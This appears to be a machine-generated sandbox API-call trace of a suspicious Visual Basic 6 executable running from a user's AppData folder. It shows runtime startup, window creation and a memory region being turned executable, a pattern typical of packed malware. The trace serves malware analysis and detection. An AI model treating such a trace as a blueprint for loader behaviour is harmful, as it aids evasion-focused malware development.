GetProcAddress (hModule=0x76b60000, lpProcName="VarRound") returned 0x76bdd155 [0077.988] GetProcAddress (hModule=0x76b60000, lpProcName="VarCmp") returned 0x76b7b0dc [0077.988] GetProcAddress (hModule=0x76b60000, lpProcName="VarDecAdd") returned 0x76b95f3e [0077.988] GetProcAddress (hModule=0x76b60000, lpProcName="VarDecCmp") returned 0x76b84fd0 [0077.988] GetProcAddress (hModule=0x76b60000, lpProcName="VarBstrCat") returned 0x76b80d2c [0077.988] GetProcAddress (hModule=0x76b60000, lpProcName="VarCyMulI4") returned 0x76b959ed [0077.988] GetProcAddress (hModule=0x76b60000, lpProcName="VarBstrCmp") returned 0x76b6f8b8 [0077.988] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x75450000 [0077.988] GetProcAddress (hModule=0x75450000, lpProcName="CoCreateInstanceEx") returned 0x75499d4e [0077.988] GetProcAddress (hModule=0x75450000, lpProcName="CLSIDFromProgIDEx") returned 0x75460782 [0077.988] GetSystemMetrics (nIndex=42) returned 0 [0077.988] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e688 | out: ppMalloc=0x72a4e688*=0x755966bc) returned 0x0 [0077.988] IMalloc:Alloc (This=0x755966bc, cb=0x4) returned 0x568ec0 [0077.988] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f968, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\iuoldw.exe")) returned 0x2c [0077.989] lstrcatA (in: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe", lpString2=".cfg" | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe.cfg") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe.cfg" [0077.989] SetLastError (dwErrCode=0x0) [0077.989] SearchPathA (in: lpPath=0x0, lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe.cfg", lpExtension=0x0, nBufferLength=0x103, lpBuffer=0x18f864, lpFilePart=0x18f838 | out: lpBuffer="|ú\x18", lpFilePart=0x18f838) returned 0x0 [0077.990] SetLastError (dwErrCode=0x2) [0077.990] GetLastError () returned 0x2 [0077.990] lstrcmpiA (lpString1="iuoldw", lpString2="MTX") returned -1 [0077.990] lstrcmpiA (lpString1="iuoldw", lpString2="DLLHOST") returned 1 [0077.990] lstrcmpiA (lpString1="iuoldw", lpString2="INETINFO") returned 1 [0077.990] lstrcmpiA (lpString1="iuoldw", lpString2="W3WP") returned -1 [0077.990] lstrcmpiA (lpString1="iuoldw", lpString2="ASPNET_WP") returned 1 [0077.990] lstrcmpiA (lpString1="iuoldw", lpString2="DLLHST3G") returned 1 [0077.990] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f95c, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\iuoldw.exe")) returned 0x2c [0077.990] lstrcmpiA (lpString1="iuoldw", lpString2="IEXPLORE") returned 1 [0077.990] LoadLibraryA (lpLibFileName="SXS.DLL") returned 0x74940000 [0078.063] GetLastError () returned 0x0 [0078.063] GetProcAddress (hModule=0x74940000, lpProcName="SxsOleAut32MapIIDOrCLSIDToTypeLibrary") returned 0x74987685 [0078.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18feac, cbMultiByte=-1, lpWideCharStr=0x18fea8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0078.064] CoRegisterMessageFilter (in: lpMessageFilter=0x232054, lplpMessageFilter=0x23205c | out: lplpMessageFilter=0x23205c*=0x0) returned 0x0 [0078.064] IUnknown:AddRef (This=0x232054) returned 0x2 [0078.064] GetClassInfoExA (in: hInstance=0x72940000, lpszClass="ThunderRT6Main", lpwcx=0x18fe78 | out: lpwcx=0x18fe78) returned 0 [0078.064] LoadIconA (hInstance=0x400000, lpIconName=0x1) returned 0xa01cf [0078.066] GetModuleHandleA (lpModuleName="USER32") returned 0x75790000 [0078.066] GetProcAddress (hModule=0x75790000, lpProcName="GetSystemMetrics") returned 0x757a7d2f [0078.066] GetProcAddress (hModule=0x75790000, lpProcName="MonitorFromWindow") returned 0x757b3150 [0078.066] GetProcAddress (hModule=0x75790000, lpProcName="MonitorFromRect") returned 0x757ce7a0 [0078.066] GetProcAddress (hModule=0x75790000, lpProcName="MonitorFromPoint") returned 0x757b5281 [0078.066] GetProcAddress (hModule=0x75790000, lpProcName="EnumDisplayMonitors") returned 0x757b451a [0078.066] GetProcAddress (hModule=0x75790000, lpProcName="GetMonitorInfoA") returned 0x757b4413 [0078.066] GetSystemMetrics (nIndex=0) returned 1440 [0078.066] GetSystemMetrics (nIndex=78) returned 1440 [0078.066] GetSystemMetrics (nIndex=1) returned 900 [0078.066] GetSystemMetrics (nIndex=79) returned 900 [0078.066] GetSystemMetrics (nIndex=50) returned 16 [0078.066] GetSystemMetrics (nIndex=49) returned 16 [0078.066] LoadImageA (hInst=0x400000, name=0x1, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x8016f [0078.066] RegisterClassExA (param_1=0x18fe78) returned 0x8ec199 [0078.066] CreateWindowExA (dwExStyle=0x80, lpClassName="ThunderRT6Main", lpWindowName=0x0, dwStyle=0x80090000, X=-2147483648, Y=-2147483648, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x20196 [0078.067] NtdllDefWindowProc_A (hWnd=0x20196, Msg=0x81, wParam=0x0, lParam=0x18fa5c) returned 0x1 [0078.067] NtdllDefWindowProc_A (hWnd=0x20196, Msg=0x83, wParam=0x0, lParam=0x18fa48) returned 0x0 [0078.068] NtdllDefWindowProc_A (hWnd=0x20196, Msg=0x1, wParam=0x0, lParam=0x18fa5c) returned 0x0 [0078.068] NtdllDefWindowProc_A (hWnd=0x20196, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0078.068] NtdllDefWindowProc_A (hWnd=0x20196, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0078.068] MonitorFromWindow (hwnd=0x20196, dwFlags=0x2) returned 0x10001 [0078.068] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x18fe80 | out: lpmi=0x18fe80) returned 1 [0078.068] SetWindowPos (hWnd=0x20196, hWndInsertAfter=0x0, X=720, Y=450, cx=0, cy=0, uFlags=0x1d) returned 1 [0078.068] NtdllDefWindowProc_A (hWnd=0x20196, Msg=0x46, wParam=0x0, lParam=0x18fe20) returned 0x0 [0078.069] NtdllDefWindowProc_A (hWnd=0x20196, Msg=0x47, wParam=0x0, lParam=0x18fe20) returned 0x0 [0078.069] NtdllDefWindowProc_A (hWnd=0x20196, Msg=0x3, wParam=0x0, lParam=0x1c202d0) returned 0x0 [0078.069] ShowWindow (hWnd=0x20196, nCmdShow=4) returned 0 [0078.069] NtdllDefWindowProc_A (hWnd=0x20196, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0078.069] NtdllDefWindowProc_A (hWnd=0x20196, Msg=0x46, wParam=0x0, lParam=0x18fe34) returned 0x0 [0078.070] NtdllDefWindowProc_A (hWnd=0x20196, Msg=0x47, wParam=0x0, lParam=0x18fe34) returned 0x0 [0078.070] GetWindowThreadProcessId (in: hWnd=0x20196, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8ec [0078.070] VirtualQuery (in: lpAddress=0x18fea8, lpBuffer=0x18fe8c, dwLength=0x1c | out: lpBuffer=0x18fe8c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.070] GetUserDefaultLCID () returned 0x409 [0078.070] IsValidCodePage (CodePage=0x3a4) returned 1 [0078.071] IsValidCodePage (CodePage=0x3b5) returned 1 [0078.071] IsValidCodePage (CodePage=0x3b6) returned 1 [0078.071] IsValidCodePage (CodePage=0x3a8) returned 1 [0078.073] GetUserDefaultLangID () returned 0x409 [0078.073] GetSystemDefaultLangID () returned 0x560409 [0078.073] GetSystemMetrics (nIndex=42) returned 0 [0078.073] IMalloc:Alloc (This=0x755966bc, cb=0xa8) returned 0x56d5f8 [0078.073] IMalloc:GetSize (This=0x755966bc, pv=0x56d5f8) returned 0xa8 [0078.073] IMalloc:Alloc (This=0x755966bc, cb=0xc) returned 0x56cef0 [0078.073] GetCurrentThreadId () returned 0x8ec [0078.073] IMalloc:Alloc (This=0x755966bc, cb=0x3c) returned 0x569f20 [0078.073] IMalloc:Alloc (This=0x755966bc, cb=0x1c) returned 0x5696f0 [0078.074] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x18fe74 | out: phkResult=0x18fe74*=0x0) returned 0x2 [0078.074] IMalloc:Alloc (This=0x755966bc, cb=0x1c) returned 0x569718 [0078.074] GetCurrentThreadId () returned 0x8ec [0078.074] SetWindowsHookExA (idHook=-1, lpfn=0x729a1e09, hmod=0x0, dwThreadId=0x8ec) returned 0x901ad [0078.075] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBMsoStdCompMgr", lpWndClass=0x18fdcc | out: lpWndClass=0x18fdcc) returned 0 [0078.075] RegisterClassA (lpWndClass=0x18fdcc) returned 0x98c19a [0078.075] CreateWindowExA (dwExStyle=0x0, lpClassName="VBMsoStdCompMgr", lpWindowName=0x0, dwStyle=0x80000000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x20216 [0078.075] NtdllDefWindowProc_A (hWnd=0x20216, Msg=0x81, wParam=0x0, lParam=0x18fa08) returned 0x1 [0078.075] NtdllDefWindowProc_A (hWnd=0x20216, Msg=0x83, wParam=0x0, lParam=0x18f9f4) returned 0x0 [0078.075] NtdllDefWindowProc_A (hWnd=0x20216, Msg=0x1, wParam=0x0, lParam=0x18fa08) returned 0x0 [0078.075] NtdllDefWindowProc_A (hWnd=0x20216, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0078.075] NtdllDefWindowProc_A (hWnd=0x20216, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0078.075] SetWindowLongA (hWnd=0x20216, nIndex=0, dwNewLong=2302108) returned 0 [0078.075] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0078.075] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0078.075] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0078.075] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0078.075] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0078.075] RegisterClipboardFormatA (lpszFormat="OwnerLink") returned 0xc003 [0078.075] RegisterClipboardFormatA (lpszFormat="FileName") returned 0xc006 [0078.075] CreateCompatibleDC (hdc=0x0) returned 0x980108c5 [0078.075] GetCurrentObject (hdc=0x980108c5, type=0x7) returned 0x185000f [0078.075] CreateWindowExA (dwExStyle=0x0, lpClassName="VBFocusRT6", lpWindowName=0x0, dwStyle=0x40000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x20196, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x301a4 [0078.075] NtdllDefWindowProc_A (hWnd=0x301a4, Msg=0x81, wParam=0x0, lParam=0x18fa98) returned 0x1 [0078.075] NtdllDefWindowProc_A (hWnd=0x301a4, Msg=0x83, wParam=0x0, lParam=0x18fa84) returned 0x0 [0078.076] NtdllDefWindowProc_A (hWnd=0x301a4, Msg=0x1, wParam=0x0, lParam=0x18fa98) returned 0x0 [0078.076] NtdllDefWindowProc_A (hWnd=0x301a4, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0078.076] NtdllDefWindowProc_A (hWnd=0x301a4, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0078.076] NtdllDefWindowProc_A (hWnd=0x20196, Msg=0x210, wParam=0x1, lParam=0x301a4) returned 0x0 [0078.076] GetCurrentThreadId () returned 0x8ec [0078.076] GetCurrentThreadId () returned 0x8ec [0078.076] lstrlenA (lpString="VB") returned 2 [0078.076] lstrlenA (lpString="CommandButton") returned 13 [0078.077] lstrlenA (lpString="VB") returned 2 [0078.077] lstrlenA (lpString="Printer") returned 7 [0078.077] lstrlenA (lpString="VB") returned 2 [0078.077] lstrlenA (lpString="Form") returned 4 [0078.077] lstrlenA (lpString="VB") returned 2 [0078.077] lstrlenA (lpString="Screen") returned 6 [0078.077] lstrlenA (lpString="VB") returned 2 [0078.077] lstrlenA (lpString="Clipboard") returned 9 [0078.078] lstrlenA (lpString="VB") returned 2 [0078.078] lstrlenA (lpString="MDIForm") returned 7 [0078.078] lstrlenA (lpString="VB") returned 2 [0078.078] lstrlenA (lpString="App") returned 3 [0078.078] lstrlenA (lpString="VB") returned 2 [0078.078] lstrlenA (lpString="UserControl") returned 11 [0078.078] lstrlenA (lpString="VB") returned 2 [0078.078] lstrlenA (lpString="PropertyPage") returned 12 [0078.079] lstrcmpiA (lpString1="VB.MDIForm", lpString2="VB.PropertyPage") returned -1 [0078.079] lstrlenA (lpString="VB") returned 2 [0078.079] lstrlenA (lpString="UserDocument") returned 12 [0078.080] GetCurrentThreadId () returned 0x8ec [0078.080] GetCurrentThreadId () returned 0x8ec [0078.080] GetCurrentThreadId () returned 0x8ec [0078.080] GetCurrentThreadId () returned 0x8ec [0078.080] GetCurrentThreadId () returned 0x8ec [0078.080] GetCurrentThreadId () returned 0x8ec [0078.080] GetCurrentThreadId () returned 0x8ec [0078.080] GetCurrentThreadId () returned 0x8ec [0078.080] GetCurrentThreadId () returned 0x8ec [0078.080] GetCurrentThreadId () returned 0x8ec [0078.081] lstrlenA (lpString="VB") returned 2 [0078.081] lstrlenA (lpString="PictureBox") returned 10 [0078.081] lstrlenA (lpString="VB") returned 2 [0078.081] lstrlenA (lpString="Label") returned 5 [0078.081] lstrlenA (lpString="VB") returned 2 [0078.081] lstrlenA (lpString="TextBox") returned 7 [0078.081] lstrlenA (lpString="VB") returned 2 [0078.082] lstrlenA (lpString="Frame") returned 5 [0078.082] lstrlenA (lpString="VB") returned 2 [0078.082] lstrlenA (lpString="CheckBox") returned 8 [0078.082] lstrlenA (lpString="VB") returned 2 [0078.082] lstrlenA (lpString="OptionButton") returned 12 [0078.082] lstrlenA (lpString="VB") returned 2 [0078.082] lstrlenA (lpString="ComboBox") returned 8 [0078.083] lstrlenA (lpString="VB") returned 2 [0078.083] lstrlenA (lpString="ListBox") returned 7 [0078.083] lstrlenA (lpString="VB") returned 2 [0078.083] lstrlenA (lpString="HScrollBar") returned 10 [0078.083] lstrlenA (lpString="VB") returned 2 [0078.083] lstrlenA (lpString="VScrollBar") returned 10 [0078.083] lstrlenA (lpString="VB") returned 2 [0078.083] lstrlenA (lpString="Timer") returned 5 [0078.084] lstrlenA (lpString="VB") returned 2 [0078.084] lstrlenA (lpString="DriveListBox") returned 12 [0078.084] lstrlenA (lpString="VB") returned 2 [0078.084] lstrlenA (lpString="DirListBox") returned 10 [0078.084] lstrlenA (lpString="VB") returned 2 [0078.084] lstrlenA (lpString="FileListBox") returned 11 [0078.084] lstrlenA (lpString="VB") returned 2 [0078.084] lstrlenA (lpString="Menu") returned 4 [0078.085] lstrlenA (lpString="VB") returned 2 [0078.085] lstrlenA (lpString="Shape") returned 5 [0078.085] lstrlenA (lpString="VB") returned 2 [0078.085] lstrlenA (lpString="Line") returned 4 [0078.085] lstrlenA (lpString="VB") returned 2 [0078.085] lstrlenA (lpString="Image") returned 5 [0078.085] lstrlenA (lpString="VB") returned 2 [0078.085] lstrlenA (lpString="Data") returned 4 [0078.086] lstrlenA (lpString="VB") returned 2 [0078.086] lstrlenA (lpString="OLE") returned 3 [0078.086] IMalloc:Alloc (This=0x755966bc, cb=0x64) returned 0x56d6a8 [0078.086] IMalloc:Alloc (This=0x755966bc, cb=0x64) returned 0x56d718 [0078.086] IMalloc:Alloc (This=0x755966bc, cb=0x64) returned 0x56d788 [0078.086] IMalloc:Alloc (This=0x755966bc, cb=0x64) returned 0x56d7f8 [0078.086] IMalloc:Alloc (This=0x755966bc, cb=0x64) returned 0x56d868 [0078.086] IMalloc:Alloc (This=0x755966bc, cb=0xc) returned 0x56cf08 [0078.086] IMalloc:Alloc (This=0x755966bc, cb=0x7c) returned 0x56d8d8 [0078.086] IMalloc:GetSize (This=0x755966bc, pv=0x56d8d8) returned 0x7c [0078.087] IMalloc:Alloc (This=0x755966bc, cb=0x20) returned 0x569920 [0078.087] GetCurrentThreadId () returned 0x8ec [0078.087] GetCurrentThreadId () returned 0x8ec [0078.087] IMalloc:Alloc (This=0x755966bc, cb=0x1c) returned 0x569948 [0078.087] VirtualProtect (in: lpAddress=0x210000, dwSize=0x6000, flNewProtect=0x4, lpflOldProtect=0x18fdf8 | out: lpflOldProtect=0x18fdf8*=0x20) returned 1 [0078.087] GetCurrentProcess () returned 0xffffffff [0078.087] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x210000, dwSize=0x6000) returned 1 [0078.087] VirtualAlloc (lpAddress=0x210000, dwSize=0x7000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0078.088] VirtualAlloc (lpAddress=0x210000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0078.088] VirtualAlloc (lpAddress=0x210000, dwSize=0x9000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0078.088] VirtualAlloc (lpAddress=0x210000, dwSize=0xa000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0078.088] VirtualProtect (in: lpAddress=0x210000, dwSize=0xa000, flNewProtect=0x20, lpflOldProtect=0x18fdf8 | out: lpflOldProtect=0x18fdf8*=0x4) returned 1 [0078.088] GetCurrentProcess () returned 0xffffffff [0078.088] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x210000, dwSize=0xa000) returned 1 [0078.088] GetCurrentThreadId () returned 0x8ec [0078.093] GetCurrentThreadId () returned 0x8ec [0078.093] SetWindowTextA (hWnd=0x20196, lpString="Ngtede") returned 1 [0078.093] NtdllDefWindowProc_A (hWnd=0x20196, Msg=0xc, wParam=0x0, lParam=0x18fd6c) returned 0x1 [0078.093] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x18fd54 | out: phkResult=0x18fd54*=0x0) returned 0x2 [0078.094] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0078.094] VirtualQuery (in: lpAddress=0x18f780, lpBuffer=0x18f764, dwLength=0x1c | out: lpBuffer=0x18f764*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0078.095] IMalloc:Alloc (This=0x755966bc, cb=0x68) returned 0x56e960 [0078.095] IMalloc:GetSize (This=0x755966bc, pv=0x56e960) returned 0x68 [0078.095] GetCurrentThreadId () returned 0x8ec [0078.095] GetCurrentThreadId () returned 0x8ec [0078.095] GetCurrentThreadId () returned 0x8ec [0078.099] GetCurrentThreadId () returned 0x8ec [0078.099] GetCurrentThreadId () returned 0x8ec [0078.099] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xb4 [0078.100] GetVersionExA (in: lpVersionInformation=0x18fa7c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x1235d0c, dwMinorVersion=0x18f9cc, dwBuildNumber=0x18fd00, dwPlatformId=0x18ff70, szCSDVersion="Í\x1e.wLÅ\x1c") | out: lpVersionInformation=0x18fa7c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0078.100] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0078.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x72992cd8, cbMultiByte=-1, lpWideCharStr=0x18faa4, cchWideChar=14 | out: lpWideCharStr="MS Sans Serif") returned 14 [0078.100] OleCreateFontIndirect () returned 0x0 [0078.158] lstrlenA (lpString="Langskallet7") returned 12 [0078.159] LoadIconA (hInstance=0x72940000, lpIconName=0x4b1) returned 0x30205 [0078.159] OleCreatePictureIndirect () returned 0x0 [0078.160] lstrlenA (lpString="Langskallet7") returned 12 [0078.160] lstrlenA (lpString="ThunderRT6") returned 10 [0078.160] lstrcpyA (in: lpString1=0x18fab8, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0078.160] lstrlenA (lpString="ThunderRT6Form") returned 14 [0078.160] lstrcpynA (in: lpString1=0x18fac6, lpString2="DC", iMaxLength=116 | out: lpString1="DC") returned="DC" [0078.160] lstrlenA (lpString="ThunderRT6") returned 10 [0078.160] lstrcpyA (in: lpString1=0x18fa4c, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0078.160] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6Form", lpWndClass=0x18fa78 | out: lpWndClass=0x18fa78) returned 0 [0078.160] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0078.160] RegisterClassA (lpWndClass=0x18fa78) returned 0xe3c19c [0078.160] lstrlenA (lpString="ThunderRT6") returned 10 [0078.160] lstrcpyA (in: lpString1=0x18fa4c, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0078.160] lstrlenA (lpString="ThunderRT6Form") returned 14 [0078.160] lstrcpynA (in: lpString1=0x18fa5a, lpString2="DC", iMaxLength=29 | out: lpString1="DC") returned="DC" [0078.160] RegisterClassA (lpWndClass=0x18fa78) returned 0xc19d [0078.160] AdjustWindowRectEx (in: lpRect=0x18fb78, dwStyle=0x2cb0000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x18fb78) returned 1 [0078.160] CreateWindowExA (dwExStyle=0x0, lpClassName=0xc19d, lpWindowName="Langskallet7", dwStyle=0x2cb0000, X=302, Y=284, nWidth=342, nHeight=229, hWndParent=0x20196, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x7022e [0078.160] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x81, wParam=0x0, lParam=0x18f69c) returned 0x1 [0078.161] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x83, wParam=0x0, lParam=0x18f688) returned 0x0 [0078.213] GetSystemMenu (hWnd=0x7022e, bRevert=0) returned 0x20209 [0078.214] SetWindowContextHelpId (param_1=0x7022e, param_2=0xffffffff) returned 1 [0078.214] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x1, wParam=0x0, lParam=0x18f69c) returned 0x0 [0078.214] GetDC (hWnd=0x7022e) returned 0x1c0108a9 [0078.214] GetTextMetricsA (in: hdc=0x1c0108a9, lptm=0x18fa64 | out: lptm=0x18fa64) returned 1 [0078.214] SetBkMode (hdc=0x1c0108a9, mode=1) returned 2 [0078.215] OleTranslateColor () returned 0x0 [0078.215] SetBkColor (hdc=0x1c0108a9, color=0xf0f0f0) returned 0xffffff [0078.215] OleTranslateColor () returned 0x0 [0078.215] SetTextColor (hdc=0x1c0108a9, color=0x0) returned 0x0 [0078.215] OleTranslateColor () returned 0x0 [0078.215] CreatePen (iStyle=0, cWidth=1, color=0x0) returned 0x273008dc [0078.215] SelectObject (hdc=0x1c0108a9, h=0x273008dc) returned 0x1b00017 [0078.215] SelectObject (hdc=0x1c0108a9, h=0x1900011) returned 0x1900010 [0078.215] ClientToScreen (in: hWnd=0x7022e, lpPoint=0x18fa44 | out: lpPoint=0x18fa44) returned 1 [0078.215] SetBrushOrgEx (in: hdc=0x1c0108a9, x=1, y=5, lppt=0x0 | out: lppt=0x0) returned 1 [0078.215] UnrealizeObject (h=0x1900015) returned 1 [0078.215] SelectObject (hdc=0x1c0108a9, h=0x1900015) returned 0x1900011 [0078.215] SelectObject (hdc=0x1c0108a9, h=0x500a08d5) returned 0x18a002e [0078.215] GetTextMetricsA (in: hdc=0x1c0108a9, lptm=0x18f858 | out: lptm=0x18f858) returned 1 [0078.216] GetClientRect (in: hWnd=0x7022e, lpRect=0x18fbf8 | out: lpRect=0x18fbf8) returned 1 [0078.216] MapWindowPoints (in: hWndFrom=0x7022e, hWndTo=0x0, lpPoints=0x18fbf8, cPoints=0x2 | out: lpPoints=0x18fbf8) returned 20250929 [0078.216] EqualRect (lprc1=0x18fbf8, lprc2=0x18fbd8) returned 1 [0078.216] SetEvent (hEvent=0xb4) returned 1 [0078.216] IsIconic (hWnd=0x7022e) returned 0 [0078.216] SendMessageA (hWnd=0x7022e, Msg=0x80, wParam=0x1, lParam=0x30205) returned 0x0 [0078.216] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x80, wParam=0x1, lParam=0x30205) returned 0x0 [0078.223] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x3020b [0078.225] IsIconic (hWnd=0x7022e) returned 0 [0078.225] IsZoomed (hWnd=0x7022e) returned 0 [0078.225] GetClientRect (in: hWnd=0x7022e, lpRect=0x18fbec | out: lpRect=0x18fbec) returned 1 [0078.225] GetWindow (hWnd=0x7022e, uCmd=0x5) returned 0x0 [0078.225] GetCurrentThreadId () returned 0x8ec [0078.225] ShowWindow (hWnd=0x7022e, nCmdShow=1) returned 0 [0078.225] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0078.225] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0078.225] NtdllDefWindowProc_A (hWnd=0x20196, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0078.226] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0078.227] NtdllDefWindowProc_A (hWnd=0x20196, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0078.227] GetWindowLongA (hWnd=0x20216, nIndex=0) returned 2302108 [0078.227] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0078.227] NtdllDefWindowProc_A (hWnd=0x20196, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0078.227] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1 [0078.227] IsIconic (hWnd=0x7022e) returned 0 [0078.227] GetFocus () returned 0x0 [0078.227] GetFocus () returned 0x0 [0078.227] IsWindowEnabled (hWnd=0x7022e) returned 1 [0078.227] GetWindowThreadProcessId (in: hWnd=0x7022e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8ec [0078.227] GetCurrentThreadId () returned 0x8ec [0078.227] SetFocus (hWnd=0x7022e) returned 0x0 [0078.234] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0078.235] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0 [0078.235] IsIconic (hWnd=0x7022e) returned 0 [0078.235] GetFocus () returned 0x7022e [0078.235] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0078.235] IsWindowEnabled (hWnd=0x7022e) returned 1 [0078.235] PostMessageA (hWnd=0x7022e, Msg=0x100e, wParam=0xa, lParam=0x0) returned 1 [0078.235] IsIconic (hWnd=0x7022e) returned 0 [0078.235] PostMessageA (hWnd=0x7022e, Msg=0x100e, wParam=0xe, lParam=0x0) returned 1 [0078.235] PostMessageA (hWnd=0x7022e, Msg=0x105a, wParam=0x0, lParam=0x0) returned 1 [0078.235] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0078.236] IsIconic (hWnd=0x7022e) returned 0 [0078.236] IsIconic (hWnd=0x7022e) returned 0 [0078.236] GetParent (hWnd=0x7022e) returned 0x0 [0078.236] GetWindowRect (in: hWnd=0x7022e, lpRect=0x18f764 | out: lpRect=0x18f764) returned 1 [0078.236] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x47, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0078.236] GetWindowLongA (hWnd=0x7022e, nIndex=-16) returned 382402560 [0078.236] GetClientRect (in: hWnd=0x7022e, lpRect=0x18f7d4 | out: lpRect=0x18f7d4) returned 1 [0078.236] MapWindowPoints (in: hWndFrom=0x7022e, hWndTo=0x0, lpPoints=0x18f7d4, cPoints=0x2 | out: lpPoints=0x18f7d4) returned 20250929 [0078.237] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x83, wParam=0x1, lParam=0x18f720) returned 0x0 [0078.238] IsWindowVisible (hWnd=0x7022e) returned 1 [0078.238] IsIconic (hWnd=0x7022e) returned 0 [0078.238] IsZoomed (hWnd=0x7022e) returned 0 [0078.238] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x5, wParam=0x0, lParam=0xc90150) returned 0x0 [0078.238] GetClientRect (in: hWnd=0x7022e, lpRect=0x18f7ac | out: lpRect=0x18f7ac) returned 1 [0078.238] GetWindow (hWnd=0x7022e, uCmd=0x5) returned 0x0 [0078.238] NtdllDefWindowProc_A 